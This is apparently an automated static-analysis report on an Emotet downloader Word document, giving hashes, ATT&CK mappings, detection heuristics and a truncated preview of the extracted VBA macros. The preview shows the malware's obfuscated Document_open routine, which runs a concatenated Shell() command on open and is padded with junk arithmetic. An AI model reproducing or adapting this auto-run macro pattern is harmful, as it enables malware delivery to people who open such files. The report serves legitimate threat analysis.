Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d486c842b7bc3178…

MALICIOUS

Office (OLE)

Size: 207.2 KB
Created: 2018-07-19 11:09:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 41d017b2c6854d3aaaf09555107332f2
SHA-1: d5c019cc323e354cef164093f39aa4dc9cbd1bee
SHA-256: d486c842b7bc3178a4ef69eb778084d523036f7e48b6aa1f24efe10ed02e5ec9
Risk Score: 182

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open macro and a critical Shell() call, strongly indicating malicious intent. The ClamAV detection name 'Doc.Downloader.Emotet-7349884-0' directly points to the Emotet family and its downloader functionality. The VBA script is designed to execute arbitrary commands, likely to download and run a second-stage payload.

Heuristics (5)

  • ClamAV: Doc.Downloader.Emotet-7349884-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7349884-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 37969 bytes
SHA-256: 2c574a4083e702055d37f0d958c71acede502d18bdc75d620d7df74451590943
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ZazdUOLZc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function lJPatFVzOfCI()
On Error Resume Next
   ZQYDQ = (MczQt * ZRmwdi - AkYGo * tmwSHz)
   EdNtGL = (zQJCnL * SpAtj - JwoUz * NJpQT)
   rTMzRb = (wicNH * BQJbY - uhDwM * DRSfKh)
   VmBul = (YTjLhu * ZDbKM - DviAKj * WiOJq)
   qdOvql = (pfmMl * UjFEdD - MnfBT * TGKVFQ)
End Function
Private Function NYoKrUl()
On Error Resume Next
   spNfBR = 51882 - zFmKL / NoJvdR - VWIvAP + (oLjFs - 44633 - mKiUR / tBHjYi)
   uGvXi = 79326 - XRMdO / ibiqC - OFpTk + (vbXOW - 66594 - RzMTi / nnatFO)
   YZucn = 47326 - soYpIh / cOjulp - Ccfzl + (nwzub - 23378 - pDYAHZ / Ziwat)
   mkKka = 85071 - TEkAC / jmWjR - kbiabM + (DTObWW - 29245 - CaZVRi / SFwTOi)
   Nbkpbd = 55514 - ooGhJ / ihbZzv - aCzznF + (vGNdSd - 90199 - rRWUQB / mKzpKL)
   lAGqP = 96785 - KiXuo / EdNin - hLwLA + (FIZcH - 96490 - tEdbQj / zuQqzW)
End Function
Private Function IihZwlJdqAu()
On Error Resume Next
   IwIHww = 58759 - LsbsFk / rjNBWi - fvHjq + (tHvqcv - 14470 - nXsjM / ZILsI)
   DoTKEp = 1105 - nNCjNz / fhtwD - OcbjM + (PAwiof - 82407 - kAmlO / jUUfs)
   HalEan = 78413 - zJzFc / DmFKkQ - FmtPCr + (vXrcO - 51942 - ANRJND / wWkOqS)
   dlSrNF = 84354 - NzMFC / EwkPJd - ELURJI + (XjObOt - 30653 - dwPqP / ZXjdKi)
   wmBwmr = 80035 - ikctlI / DSdjVz - bBomm + (oawWj - 2511 - BwjkUS / wfizK)
   ZnZHBC = 76513 - pXwfPc / XqBID - nAWMu + (QIAMY - 26991 - wECHZ / MWclRX)
   bdwwn = 47715 - zaDzA / ikkrIf - TlATNL + (oonziW - 23260 - ldQGr / jYLsPo)
End Function
Private Sub Document_open()
On Error Resume Next
   pYkWKO = 5222 - udati / 69356 + UMRKwE * (51940 / 68094 + 43991 - CBXAj)
   slGnUn = 162 - EajJj / 22109 + bKDUY * (41767 / 25498 + 80708 - pNRIN)
   VBjtV = 96344 - EsCYZV / 42564 + KDjbb * (11511 / 88651 + 31589 - VMjVj)
   bYImVj = 82468 - SODKti / 19717 + qBEWop * (23518 / 21267 + 52590 - dXIOOV)
Shell "" + szAtdCAYQ + dranurZNzMLFfv + CVar("c") + HWrLZHWQkKQwHD + kSMWOZXQ + cZPOLzYCME + SdJITQX + jjzRjMiQRN + XvGMAqGhFS + HfqoUjkilUa + EEizvCOG + nYXMhP + jBtDNBlDw + vBVQVDjowWN + DAJWqVuIcT + ZKnzPDzdLp + vZvpKfNSSWu + jXhCSk + BMjzaMtIMCjXVL + TiKKmLzKkGThD, 0
   wplIlG = 3771 - KujzIr / 26164 + MtVur * (2117 / 85675 + 20924 - PZPUtL)
End Sub
Private Function arGczpVEpTJPid()
On Error Resume Next
   cKYqYW = (TcvSGf - UPdaU / (95888 * YfYBwc / KwaYw * pkESn))
   tcIFjX = (XWDJMG - GTOAdv / (13440 * jUXwzK / EJjDu * bHKjs))
   QUznN = (htric - HQdcV / (44842 * urVMfb / pddbVM * DRLcXi))
   JCjPJm = (qIBCI - IaShB / (43169 * ifaKsK / cVvWaT * izrLo))
   jiNtU = (vBUVo - ufvISL / (47225 * DPPNQ / EwRAw * rjIqzl))
   cOrmmw = (oczIMW - tohkZd / (1015 * ucJLb / MDTkKa * UdlJB))
End Function
Private Function SoDTHIPnuBVKff()
On Error Resume Next
   UiisGs = (ukWqEn - Baomk / (22670 * qraDC / RGGwYk * THrjnX))
   UAjvH = (IkSrpI - rZAwtH / (57779 * lLMCU / UziFUj * bVRdJ))
   qzbzTJ = 6298 - bRzSwV / 1365 + RYBLL * (60857 / 74002 + 47587 - qpFGVz)
   atnwQj = (PEJbpo - jpWsmC / (77707 * olVbuP / jTjOk * rXQmod))
   jMYfFn = (pwBts - imDoD / (769 * ndYRU / kujEwM * jGiCYw))
End Function
Private Function khjCdmSAAQ()
On Error Resume Next
   wUVpva = 88410 - fLEiIU / 92960 + YHdzA * (35456 / 91356 + 51595 - YuCvo)
   MHtzP = 27487 - juWXT / 128 + wtjsi * (69457 / 13591 + 52840 - cwzRri)
   ffqPn = 90000 - flCDU / 49503 + tsuKYR * (41327 / 60629 + 97320 - ZumXjr)
   Nfwddh = 52995 - uzLwPa / 2099 + fCHkP * (63997 / 6063 + 99898 - LpsHpw)
   pTWwG = 77498 - FqzzaS / 41795 + mJRjbm * (75227 / 13476 + 62188 - JPjcr)
   FdaGsV = 73161 - XIimj / 17558 + IFfqij * (58045 / 51076 + 3748 - qazYw)
End Function
Private Function IwirWpVnv()
On Error Resume Next
   BoRbjd = (UQVUB - KNvar / (16999 * zSpIZA / OhwfL * DCLnA))
   nMGodX = (zfGcci - bjPfBi / (62523 * fmzznw / cGXAd * EoHCE))
   NkCUMO = (zniRNl - dbrikN / (37977 * pGCIko 
... (truncated)